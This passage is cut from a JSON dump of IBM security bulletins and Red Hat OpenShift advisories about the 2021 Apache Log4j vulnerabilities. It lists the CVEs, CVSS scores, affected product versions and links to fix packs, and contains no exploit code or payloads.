[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Enterprise+Insight+Analysis&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Enterprise+Insight+Analysis&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Enterprise+Insight+Analysis&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Connect&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0>) \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Enterprise+Insight+Analysis&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Connect&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyst's Notebook Premium| 9.3.1| Chart store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Analysts+Notebook+Premium&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0>) \ni2 Analyst's Notebook Premium| 9.3.0| Chart Store component| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Analysts+Notebook+Premium&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0>) \n \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Enterprise+Insight+Analysis&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \n \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Enterprise+Insight+Analysis&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.3.3.2-SEC-i2EIA-WinLinux-FP0002&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.3.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \n \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0| \n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&amp;product=ibm/Other+software/i2+Connect&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVTH\",\"label\":\"i2 Analyze\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T20:13:22", "type": "ibm", "title": "Security Bulletin: IBM i2 Analyze and IBM i2 Analyst's Notebook Premium are affected by Apache Log4j Vulnerabilities (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T20:13:22", "id": "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "href": "https://www.ibm.com/support/pages/node/6537918", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:49:17", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j open source library which is used by SPSS Collaboration and Deployment Services for logging of messages and traces. These issues have been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by installing the fix listed.**\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nSPSS Collaboration and Deployment Services| \n\n8.3.0.0\n\n| \n\nPH42959\n\n| \n\n[8.3.0.0-IM-SCaDS-IF005](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&release=8.3.0.0&platform=All&function=fixId&fixids=8.3.0.0-IM-SCaDS-IF005&login=true> \"8.3.0.0-IM-SCaDS-IF005\" ) \n \n**The fix needs to be applied to these components: \n**\n\nSPSS Collaboration and Deployment Services Repository Server\n\nSPSS Collaboration and Deployment Services Remote Scoring Server\n\nSPSS Collaboration and Deployment Services Remote Process Server\n\nSPSS Collaboration and Deployment Services Deployment Manager\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n22 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS69YH\",\"label\":\"SPSS Collaboration and Deployment Services\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:04:37", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affects SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T15:04:37", "id": "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "href": "https://www.ibm.com/support/pages/node/6536704", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-12-16T20:42:54", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T19:49:01", "type": "redhat", "title": "(RHSA-2021:5148) Critical: OpenShift Container Platform 4.8.24 extras security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T16:02:15", "id": "RHSA-2021:5148", "href": "https://access.redhat.com/errata/RHSA-2021:5148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T20:39:56", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T07:44:46", "type": "redhat", "title": "(RHSA-2021:5141) Critical: OpenShift Container Platform 4.6.52 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T07:44:56", "id": "RHSA-2021:5141", "href": "https://access.redhat.com/errata/RHSA-2021:5141", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:38:41", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046 (CVE-2021-4125)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:35:00", "type": "redhat", "title": "(RHSA-2021:5184) Critical: OpenShift Container Platform 4.7.40 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:35:14", "id": "RHSA-2021:5184", "href": "https://access.redhat.com/errata/RHSA-2021:5184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:42:20", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046 (CVE-2021-4125)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:25:00", "type": "redhat", "title": "(RHSA-2021:5186) Critical: OpenShift Container Platform 4.6.52 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:26:17", "id": "RHSA-2021:5186", "href": "https://access.redhat.com/errata/RHSA-2021:5186", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:42:44", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046 (CVE-2021-4125)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:10:20", "type": "redhat", "title": "(RHSA-2021:5183) Critical: OpenShift Container Platform 4.8.24 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:10:33", "id": "RHSA-2021:5183", "href": "https://access.redhat.com/errata/RHSA-2021:5183", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T20:42:15", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:53:52", "type": "redhat", "title": "(RHSA-2021:5107) Critical: OpenShift Container Platform 4.7.40 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-43527", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T14:54:04", "id": "RHSA-2021:5107", "href": "https://access.redhat.com/errata/RHSA-2021:5107", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-11T11:33:52", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T05:40:01", "type": "redhat", "title": "(RHSA-2021:5094) Moderate: OpenShift Container Platform 3.11.z security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", 